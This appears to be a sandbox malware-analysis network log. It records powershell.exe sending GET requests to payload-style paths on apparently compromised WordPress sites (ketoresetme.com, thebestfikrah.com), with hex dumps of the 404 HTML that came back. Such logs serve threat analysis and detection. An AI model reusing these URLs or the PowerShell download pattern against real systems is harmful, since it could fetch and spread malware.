                                              Jan 7, 2021 11:47:07.072895050 CET1INData Raw: 33 61 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 63 68 27 20 68 72 65 66 3d 27 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 27 20 2f 3e 0a 0d 0a 32 64 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73
                                              Data Ascii: 3a<link rel='dns-prefetch' href='//fonts.googleapis.com' />2d<link rel='dns-prefetch' href='//s.w.org' />
                                              Jan 7, 2021 11:47:07.072925091 CET1INData Raw: 38 30 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 57 68 65 65 6c 20 43 6f 20 4d 6f 76 69 6e 67 20 26 72 61 71 75 6f
                                              Data Ascii: 80<link rel="alternate" type="application/rss+xml" title="Wheel Co Moving &raquo; Feed" href="https://wheelcomoving.com/feed/" />
                                              Jan 7, 2021 11:47:07.073151112 CET2INData Raw: 39 32 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 57 68 65 65 6c 20 43 6f 20 4d 6f 76 69 6e 67 20 26 72 61 71 75 6f
                                              Data Ascii: 92<link rel="alternate" type="application/rss+xml" title="Wheel Co Moving &raquo; Comments Feed" href="https://wheelcomoving.com/comments/feed/" />
                                              Jan 7, 2021 11:47:07.073260069 CET3INData Raw: 33 66 0d 0a 09 09 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 09 09 09 77 69 6e 64 6f 77 2e 5f 77 70 65 6d 6f 6a 69 53 65 74 74 69 6e 67 73 20 3d 20 0d 0a 38 34 31 0d 0a 7b 22 62 61 73 65 55 72
                                              Data Ascii: 3f<script type="text/javascript">window._wpemojiSettings = 841{"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/13.0.1\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/13.0.1\/svg\/","svgExt":".svg","sourc
                                              Jan 7, 2021 11:47:07.073304892 CET4INData Raw: 6f 72 28 69 3d 41 72 72 61 79 28 22 66 6c 61 67 22 2c 22 65 6d 6f 6a 69 22 29 2c 74 2e 73 75 70 70 6f 72 74 73 3d 7b 65 76 65 72 79 74 68 69 6e 67 3a 21 30 2c 65 76 65 72 79 74 68 69 6e 67 45 78 63 65 70 74 46 6c 61 67 3a 21 30 7d 2c 6f 3d 30 3b
                                              Data Ascii: or(i=Array("flag","emoji"),t.supports={everything:!0,everythingExceptFlag:!0},o=0;o<i.length;o++)t.supports[i[o]]=l(i[o]),t.supports.everything=t.supports.everything&&t.supports[i[o]],"flag"!==i[o]&&(t.supports.everythingExceptFlag=t.supports.
                                              Jan 7, 2021 11:47:07.073339939 CET4INData Raw: 31 33 63 0d 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 69 6d 67 2e 77 70 2d 73 6d 69 6c 65 79 2c 0a 69 6d 67 2e 65 6d 6f 6a 69 20 7b 0a 09 64 69 73 70 6c 61 79 3a 20 69 6e 6c 69 6e 65 20 21 69 6d 70 6f 72 74 61 6e
                                              Data Ascii: 13c<style type="text/css">img.wp-smiley,img.emoji {display: inline !important;border: none !important;box-shadow: none !important;height: 1em !important;width: 1em !important;margin: 0 .07em !important;vertical-align: -0.1em
                                              Jan 7, 2021 11:47:07.073368073 CET5INData Raw: 61 61 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 69 64 3d 27 77 70 2d 62 6c 6f 63 6b 2d 6c 69 62 72 61 72 79 2d 63 73 73 27 20 20 68 72 65 66 3d 27 68 74 74 70 3a 2f 2f 77 68 65 65 6c 63 6f 6d 6f 76 69 6e 67 2e 63
                                              Data Ascii: aa<link rel='stylesheet' id='wp-block-library-css' href='http://wheelcomoving.com/wp-includes/css/dist/block-library/style.min.css?ver=5.6' type='text/css' media='all' />
                                              Jan 7, 2021 11:47:07.219362974 CET6INData Raw: 61 38 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 69 64 3d 27 62 74 5f 63 63 5f 73 74 79 6c 65 2d 63 73 73 27 20 20 68 72 65 66 3d 27 68 74 74 70 3a 2f 2f 77 68 65 65 6c 63 6f 6d 6f 76 69 6e 67 2e 63 6f 6d 2f 77 70
                                              Data Ascii: a8<link rel='stylesheet' id='bt_cc_style-css' href='http://wheelcomoving.com/wp-content/plugins/bt_cost_calculator/style.min.css?ver=5.6' type='text/css' media='all' />b3<link rel='stylesheet' id='contact-form-7-css' href='http://whee


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              1192.168.2.224916770.32.23.5880C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              TimestampkBytes transferredDirectionData
                                              Jan 7, 2021 11:47:30.139081001 CET52OUTGET /wp-content/pmJ/ HTTP/1.1
                                              Host: ketoresetme.com
                                              Connection: Keep-Alive
                                              Jan 7, 2021 11:47:31.352452040 CET53INHTTP/1.1 404 Not Found
                                              Date: Thu, 07 Jan 2021 10:47:30 GMT
                                              Server: Apache
                                              X-Powered-By: PHP/7.3.25
                                              Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                              Cache-Control: no-cache, must-revalidate, max-age=0
                                              Link: <https://ketoresetme.com/wp-json/>; rel="https://api.w.org/"
                                              Strict-Transport-Security: max-age=63072000; includeSubDomains
                                              X-Frame-Options: SAMEORIGIN
                                              X-Content-Type-Options: nosniff
                                              Vary: Accept-Encoding
                                              Keep-Alive: timeout=3, max=500
                                              Connection: Keep-Alive
                                              Transfer-Encoding: chunked
                                              Content-Type: text/html; charset=UTF-8
                                              Data Raw: 32 30 65 65 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 20 3e 0d 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 69 65 38 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0d 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 39 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 69 65 39 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0d 0a 3c 21 2d 2d 5b 69 66 20 67 74 20 49 45 20 38 5d 3e 3c 21 2d 2d 3e 20 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 7c 20 44 72 2e 41 6e 64 72 65 61 20 44 61 76 69 73 2c 20 50 75 62 6c 69 63 20 48 65 61 6c 74 68 20 45 78 70 65 72 74 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 69 6e 67 62 61 63 6b 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 6b 65 74 6f 72 65 73 65 74 6d 65 2e 63 6f 6d 2f 78 6d 6c 72 70 63 2e 70 68 70 22 20 2f 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 70 6e 67 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 6b 65 74 6f 72 65 73 65 74 6d 65 2e 63 6f 6d 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 75 70 6c 6f 61 64 73 2f 32 30 32 30 2f 30 39 2f 74 74 74 2e 70 6e 67 22 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 63 68 27 20 68 72 65 66 3d 27 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 63 68 27 20 68 72 65 66 3d 27 2f 2f 73 2e 77 2e 6f 72 67 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 44 72 2e 41 6e 64 72 65 61 20 44 61 76 69 73 2c 20 50 75 62 6c 69 63 20 48 65 61 6c 74 68 20 45 78 70 65 72 74 20 26 72 61 71 75 6f 3b 20 46 65 65 64 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 6b 65 74 6f
                                              Data Ascii: 20ee<!doctype html >...[if IE 8]> <html class="ie8" lang="en"> <![endif]-->...[if IE 9]> <html class="ie9" lang="en"> <![endif]-->...[if gt IE 8]>...> <html lang="en-US"> ...<![endif]--><head> <title>Page not found | Dr.Andrea Davis, Public Health Expert</title> <meta charset="UTF-8" /> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <link rel="pingback" href="http://ketoresetme.com/xmlrpc.php" /> <link rel="icon" type="image/png" href="https://ketoresetme.com/wp-content/uploads/2020/09/ttt.png"><link rel='dns-prefetch' href='//fonts.googleapis.com' /><link rel='dns-prefetch' href='//s.w.org' /><link rel="alternate" type="application/rss+xml" title="Dr.Andrea Davis, Public Health Expert &raquo; Feed" href="https://keto
                                              Jan 7, 2021 11:47:31.352494955 CET55INData Raw: 72 65 73 65 74 6d 65 2e 63 6f 6d 2f 66 65 65 64 2f 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 44 72 2e 41
                                              Data Ascii: resetme.com/feed/" /><link rel="alternate" type="application/rss+xml" title="Dr.Andrea Davis, Public Health Expert &raquo; Comments Feed" href="https://ketoresetme.com/comments/feed/" /><script type="text/javascript">window._wpemojiSet
                                              Jan 7, 2021 11:47:31.352545023 CET56INData Raw: 35 35 33 35 37 2c 35 36 34 32 34 2c 38 32 30 33 2c 35 35 33 35 36 2c 35 37 32 31 32 5d 29 7d 72 65 74 75 72 6e 21 31 7d 66 75 6e 63 74 69 6f 6e 20 64 28 65 29 7b 76 61 72 20 74 3d 61 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 73 63 72 69 70
                                              Data Ascii: 55357,56424,8203,55356,57212])}return!1}function d(e){var t=a.createElement("script");t.src=e,t.defer=t.type="text/javascript",a.getElementsByTagName("head")[0].appendChild(t)}for(i=Array("flag","emoji"),t.supports={everything:!0,everythingExc
                                              Jan 7, 2021 11:47:31.352581978 CET57INData Raw: 65 3e 0a 09 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 69 64 3d 27 77 70 2d 62 6c 6f 63 6b 2d 6c 69 62 72 61 72 79 2d 63 73 73 27 20 20 68 72 65 66 3d 27 68 74 74 70 3a 2f 2f 6b 65 74 6f 72 65 73 65 74 6d 65 2e 63 6f 6d
                                              Data Ascii: e><link rel='stylesheet' id='wp-block-library-css' href='http://ketoresetme.com/wp-includes/css/dist/block-library/style.min.css?ver=5.5.3' type='text/css' media='all' /><link rel='stylesheet' id='wc-block-vendors-style-css' href='http://
                                              Jan 7, 2021 11:47:31.352615118 CET59INData Raw: 6d 65 64 69 61 3d 27 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 20 37 36 38 70 78 29 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 69 64 3d 27 77 6f 6f 63 6f 6d 6d 65 72
                                              Data Ascii: media='only screen and (max-width: 768px)' /><link rel='stylesheet' id='woocommerce-general-css' href='http://ketoresetme.com/wp-content/plugins/woocommerce/assets/css/woocommerce.css?ver=4.5.1' type='text/css' media='all' /><style id='wooc
                                              Jan 7, 2021 11:47:31.352646112 CET60INData Raw: 65 2d 6c 61 77 2d 69 6e 66 6f 2d 6a 73 2d 65 78 74 72 61 27 3e 0a 2f 2a 20 3c 21 5b 43 44 41 54 41 5b 20 2a 2f 0a 76 61 72 20 43 6c 69 5f 44 61 74 61 20 3d 20 7b 22 6e 6e 5f 63 6f 6f 6b 69 65 5f 69 64 73 22 3a 5b 5d 2c 22 63 6f 6f 6b 69 65 6c 69
                                              Data Ascii: e-law-info-js-extra'>/* <![CDATA[ */var Cli_Data = {"nn_cookie_ids":[],"cookielist":[],"ccpaEnabled":"","ccpaRegionBased":"","ccpaBarEnabled":"","ccpaType":"gdpr","js_blocking":"1","custom_integration":"","triggerDomRefresh":""};var cli_coo
                                              Jan 7, 2021 11:47:31.352674007 CET61INData Raw: 61 67 61 69 6e 22 2c 22 73 68 6f 77 61 67 61 69 6e 5f 78 5f 70 6f 73 69 74 69 6f 6e 22 3a 22 31 30 30 70 78 22 2c 22 74 65 78 74 22 3a 22 23 33 33 33 33 33 33 22 2c 22 73 68 6f 77 5f 6f 6e 63 65 5f 79 6e 22 3a 22 22 2c 22 73 68 6f 77 5f 6f 6e 63
                                              Data Ascii: again","showagain_x_position":"100px","text":"#333333","show_once_yn":"","show_once":"10000","logging_on":"","as_popup":"","popup_overlay":"1","bar_heading_text":"","cookie_bar_as":"banner","popup_showagain_position":"bottom-right","widget_pos
                                              Jan 7, 2021 11:47:31.354415894 CET63INData Raw: 34 30 30 30 0d 0a 09 3c 73 74 79 6c 65 20 69 64 3d 22 74 64 77 2d 63 73 73 2d 70 6c 61 63 65 68 6f 6c 64 65 72 22 3e 3c 2f 73 74 79 6c 65 3e 09 09 09 3c 73 63 72 69 70 74 3e 0d 0a 09 09 09 09 77 69 6e 64 6f 77 2e 74 64 77 47 6c 6f 62 61 6c 20 3d
                                              Data Ascii: 4000<style id="tdw-css-placeholder"></style><script>window.tdwGlobal = {"adminUrl":"https:\/\/ketoresetme.com\/wp-admin\/","wpRestNonce":"248f3fd52c","wpRestUrl":"https:\/\/ketoresetme.com\/wp-json\/","permalinkStructure":"\/%year%
                                              Jan 7, 2021 11:47:31.354450941 CET64INData Raw: 0d 0a 0d 0a 20 20 20 20 20 20 20 20 2f 2f 20 74 64 5f 6a 73 5f 67 65 6e 65 72 61 74 6f 72 20 2d 20 6d 69 6e 69 20 64 65 74 65 63 74 6f 72 0d 0a 20 20 20 20 20 20 20 20 28 66 75 6e 63 74 69 6f 6e 28 29 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20
                                              Data Ascii: // td_js_generator - mini detector (function(){ var htmlTag = document.getElementsByTagName("html")[0]; if ( navigator.userAgent.indexOf("MSIE 10.0") > -1 ) { htmlTag.className
                                              Jan 7, 2021 11:47:31.382409096 CET65INData Raw: 27 20 74 64 2d 6d 64 2d 69 73 2d 73 61 66 61 72 69 27 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0d 0a 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 69 66 28 20 2d 31 20 21 3d 3d 20 6e 61 76 69 67 61 74 6f 72 2e 75 73 65 72 41 67 65 6e 74 2e 69
                                              Data Ascii: ' td-md-is-safari'; } if( -1 !== navigator.userAgent.indexOf('IEMobile') ){ htmlTag.className += ' td-md-is-iemobile'; } })(); var tdLocalCache = {};
                                              Jan 7, 2021 11:47:31.502430916 CET67INData Raw: 73 74 61 63 6b 5f 67 65 6e 65 72 61 6c 5f 73 65 6c 65 63 74 6f 72 73 3d 22 2e 74 64 2d 61 6e 69 6d 61 74 69 6f 6e 2d 73 74 61 63 6b 20 69 6d 67 2c 20 2e 74 64 2d 61 6e 69 6d 61 74 69 6f 6e 2d 73 74 61 63 6b 20 2e 65 6e 74 72 79 2d 74 68 75 6d 62
                                              Data Ascii: stack_general_selectors=".td-animation-stack img, .td-animation-stack .entry-thumb, .post img";var td_ajax_url="https:\/\/ketoresetme.com\/wp-admin\/admin-ajax.php?td_theme_name=Newspaper&v=8.1";var td_get_template_directory_uri="http:\/\/ke


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              2192.168.2.2249172103.8.25.6380C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              TimestampkBytes transferredDirectionData
                                              Jan 7, 2021 11:48:02.983000040 CET161OUTGET /wp-admin/fOIlVX/ HTTP/1.1
                                              Host: thebestfikrah.com
                                              Connection: Keep-Alive
                                              Jan 7, 2021 11:48:05.069173098 CET162INHTTP/1.1 404 Not Found
                                              Date: Thu, 07 Jan 2021 10:48:02 GMT
                                              Server: Apache
                                              X-UA-Compatible: IE=edge
                                              Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                              Cache-Control: no-cache, must-revalidate, max-age=0
                                              Link: <https://thebestfikrah.com/wp-json/>; rel="https://api.w.org/"
                                              Vary: Accept-Encoding,User-Agent
                                              Referrer-Policy: no-referrer-when-downgrade
                                              Keep-Alive: timeout=5, max=100
                                              Connection: Keep-Alive
                                              Transfer-Encoding: chunked
                                              Content-Type: text/html; charset=UTF-8
                                              Data Raw: 34 30 30 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 68 74 6d 6c 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0a 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 09 3c 21 2d 2d 20 54 68 69 73 20 73 69 74 65 20 69 73 20 6f 70 74 69 6d 69 7a 65 64 20 77 69 74 68 20 74 68 65 20 59 6f 61 73 74 20 53 45 4f 20 70 6c 75 67 69 6e 20 76 31 35 2e 35 20 2d 20 68 74 74 70 73 3a 2f 2f 79 6f 61 73 74 2e 63 6f 6d 2f 77 6f 72 64 70 72 65 73 73 2f 70 6c 75 67 69 6e 73 2f 73 65 6f 2f 20 2d 2d 3e 0a 09 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 2d 20 54 68 65 20 42 65 73 74 20 46 69 6b 72 61 68 3c 2f 74 69 74 6c 65 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 6c 6f 63 61 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 65 6e 5f 55 53 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 74 69 74 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 2d 20 54 68 65 20 42 65 73 74 20 46 69 6b 72 61 68 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 73 69 74 65 5f 6e 61 6d 65 22 20 63 6f 6e 74 65 6e 74 3d 22 54 68 65 20 42 65 73 74 20 46 69 6b 72 61 68 22 20 2f 3e 0a 09 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6c 64 2b 6a 73 6f 6e 22 20 63 6c 61 73 73 3d 22 79 6f 61 73 74 2d 73 63 68 65 6d 61 2d 67 72 61 70 68 22 3e 7b 22 40 63 6f 6e 74 65 78 74 22 3a 22 68 74 74 70 73 3a 2f 2f 73 63 68 65 6d 61 2e 6f 72 67 22 2c 22 40 67 72 61 70 68 22 3a 5b 7b 22 40 74 79 70 65 22 3a 22 57 65 62 53 69 74 65 22 2c 22 40 69 64 22 3a 22 68 74 74 70 73 3a 2f 2f 73 74 61 67 65 2e 74 68 65 62 65 73 74 66 69 6b 72 61 68 2e 63 6f 6d 2f 23 77 65 62 73 69 74 65 22 2c 22 75 72 6c 22 3a 22 68 74 74 70 73 3a 2f 2f 73 74 61 67 65 2e 74 68 65 62 65 73 74 66 69 6b 72 61 68 2e 63 6f 6d 2f 22 2c 22 6e 61 6d 65 22 3a 22 54 68 65 20 42 65 73 74 20 46 69 6b 72 61 68 22 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 54 68 69 6e 6b 20 52 69 67 68 74 2e 20 4c 65
                                              Data Ascii: 4000<!DOCTYPE html><html class="html" lang="en-US"><head><meta charset="UTF-8"><link rel="profile" href="https://gmpg.org/xfn/11"><meta name="viewport" content="width=device-width, initial-scale=1">... This site is optimized with the Yoast SEO plugin v15.5 - https://yoast.com/wordpress/plugins/seo/ --><title>Page not found - The Best Fikrah</title><meta name="robots" content="noindex, follow" /><meta property="og:locale" content="en_US" /><meta property="og:title" content="Page not found - The Best Fikrah" /><meta property="og:site_name" content="The Best Fikrah" /><script type="application/ld+json" class="yoast-schema-graph">{"@context":"https://schema.org","@graph":[{"@type":"WebSite","@id":"https://stage.thebestfikrah.com/#website","url":"https://stage.thebestfikrah.com/","name":"The Best Fikrah","description":"Think Right. Le
                                              Jan 7, 2021 11:48:05.069231987 CET164INData Raw: 61 64 20 57 65 6c 6c 2e 22 2c 22 70 6f 74 65 6e 74 69 61 6c 41 63 74 69 6f 6e 22 3a 5b 7b 22 40 74 79 70 65 22 3a 22 53 65 61 72 63 68 41 63 74 69 6f 6e 22 2c 22 74 61 72 67 65 74 22 3a 22 68 74 74 70 73 3a 2f 2f 73 74 61 67 65 2e 74 68 65 62 65
                                              Data Ascii: ad Well.","potentialAction":[{"@type":"SearchAction","target":"https://stage.thebestfikrah.com/?s={search_term_string}","query-input":"required name=search_term_string"}],"inLanguage":"en-US"}]}</script>... / Yoast SEO plugin. --><link r
                                              Jan 7, 2021 11:48:05.069273949 CET165INData Raw: 63 6f 6f 6b 69 65 20 3d 20 64 69 73 61 62 6c 65 53 74 72 20 2b 20 27 3d 74 72 75 65 3b 20 65 78 70 69 72 65 73 3d 54 68 75 2c 20 33 31 20 44 65 63 20 32 30 39 39 20 32 33 3a 35 39 3a 35 39 20 55 54 43 3b 20 70 61 74 68 3d 2f 27 3b 0a 09 20 20 77
                                              Data Ascii: cookie = disableStr + '=true; expires=Thu, 31 Dec 2099 23:59:59 UTC; path=/'; window[disableStr] = true;}if ( 'undefined' === typeof gaOptout ) {function gaOptout() {__gaTrackerOptout();}}if ( em_track_user ) {(funct
                                              Jan 7, 2021 11:48:05.069402933 CET166INData Raw: 3d 3d 3d 20 30 20 29 20 7b 0a 09 09 09 09 09 72 65 74 75 72 6e 3b 0a 09 09 09 09 7d 0a 09 09 09 09 76 61 72 20 66 20 3d 20 61 72 67 75 6d 65 6e 74 73 5b 6c 65 6e 2d 31 5d 3b 0a 09 09 09 09 69 66 20 28 20 74 79 70 65 6f 66 20 66 20 21 3d 3d 20 27
                                              Data Ascii: === 0 ) {return;}var f = arguments[len-1];if ( typeof f !== 'object' || f === null || typeof f.hitCallback !== 'function' ) {console.log( 'Not running function __gaTracker(' + arguments[0] + " ....) because you are n
                                              Jan 7, 2021 11:48:05.069453001 CET168INData Raw: 61 74 61 55 52 4c 28 29 7d 66 75 6e 63 74 69 6f 6e 20 6c 28 65 29 7b 69 66 28 21 73 7c 7c 21 73 2e 66 69 6c 6c 54 65 78 74 29 72 65 74 75 72 6e 21 31 3b 73 77 69 74 63 68 28 73 2e 74 65 78 74 42 61 73 65 6c 69 6e 65 3d 22 74 6f 70 22 2c 73 2e 66
                                              Data Ascii: ataURL()}function l(e){if(!s||!s.fillText)return!1;switch(s.textBaseline="top",s.font="600 32px Arial",e){case"flag":return!c([127987,65039,8205,9895,65039],[127987,65039,8203,9895,65039])&&(!c([55356,56826,55356,56819],[55356,56826,8203,55356
                                              Jan 7, 2021 11:48:05.069499016 CET169INData Raw: 63 6f 6d 70 6c 65 74 65 22 3d 3d 3d 61 2e 72 65 61 64 79 53 74 61 74 65 26 26 74 2e 72 65 61 64 79 43 61 6c 6c 62 61 63 6b 28 29 7d 29 29 2c 28 72 3d 74 2e 73 6f 75 72 63 65 7c 7c 7b 7d 29 2e 63 6f 6e 63 61 74 65 6d 6f 6a 69 3f 64 28 72 2e 63 6f
                                              Data Ascii: complete"===a.readyState&&t.readyCallback()})),(r=t.source||{}).concatemoji?d(r.concatemoji):r.wpemoji&&r.twemoji&&(d(r.twemoji),d(r.wpemoji)))}(window,document,window._wpemojiSettings);</script><style type="text/css">img.wp-smiley,img
                                              Jan 7, 2021 11:48:05.069529057 CET170INData Raw: 69 74 61 6c 69 63 2c 35 30 30 2c 35 30 30 69 74 61 6c 69 63 2c 36 30 30 2c 36 30 30 69 74 61 6c 69 63 2c 37 30 30 2c 37 30 30 69 74 61 6c 69 63 2c 38 30 30 2c 38 30 30 69 74 61 6c 69 63 2c 39 30 30 2c 39 30 30 69 74 61 6c 69 63 26 23 30 33 38 3b
                                              Data Ascii: italic,500,500italic,600,600italic,700,700italic,800,800italic,900,900italic&#038;subset=latin%2Clatin-ext' type='text/css' media='all' /><link rel='stylesheet' id='wp-block-library-css' href='http://thebestfikrah.com/wp-includes/css/dist/bl
                                              Jan 7, 2021 11:48:05.069559097 CET172INData Raw: 31 39 20 2e 73 70 63 6f 6c 6c 61 70 73 69 6e 67 20 7b 20 68 65 69 67 68 74 3a 20 30 3b 20 6f 76 65 72 66 6c 6f 77 3a 20 68 69 64 64 65 6e 3b 20 74 72 61 6e 73 69 74 69 6f 6e 2d 70 72 6f 70 65 72 74 79 3a 20 68 65 69 67 68 74 3b 74 72 61 6e 73 69
                                              Data Ascii: 19 .spcollapsing { height: 0; overflow: hidden; transition-property: height;transition-duration: 300ms;} .sp-easy-accordion iframe {width: 100%;}#sp-ea-102119.sp-easy-accordion .sp-ea-single {border: 0px solid #e2e2e2; }#sp-ea-102119.sp-easy-
                                              Jan 7, 2021 11:48:05.069598913 CET173INData Raw: 69 6b 72 61 68 2e 63 6f 6d 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 70 6c 75 67 69 6e 73 2f 61 77 73 6d 2d 74 65 61 6d 2f 63 73 73 2f 74 65 61 6d 2e 6d 69 6e 2e 63 73 73 3f 76 65 72 3d 31 2e 32 2e 31 27 20 74 79 70 65 3d 27 74 65 78 74 2f 63 73 73 27
                                              Data Ascii: ikrah.com/wp-content/plugins/awsm-team/css/team.min.css?ver=1.2.1' type='text/css' media='all' /><link rel='stylesheet' id='exactmetrics-popular-posts-style-css' href='http://thebestfikrah.com/wp-content/plugins/google-analytics-dashboard-fo
                                              Jan 7, 2021 11:48:05.069643021 CET175INData Raw: 73 2f 6f 63 65 61 6e 77 70 2f 61 73 73 65 74 73 2f 63 73 73 2f 74 68 69 72 64 2f 6d 61 67 6e 69 66 69 63 2d 70 6f 70 75 70 2e 6d 69 6e 2e 63 73 73 3f 76 65 72 3d 31 2e 30 2e 30 27 20 74 79 70 65 3d 27 74 65 78 74 2f 63 73 73 27 20 6d 65 64 69 61
                                              Data Ascii: s/oceanwp/assets/css/third/magnific-popup.min.css?ver=1.0.0' type='text/css' media='all' /><link rel='stylesheet' id='slick-css' href='http://thebestfikrah.com/wp-content/themes/oceanwp/assets/css/third/slick.min.css?ver=1.6.0' type='text/cs
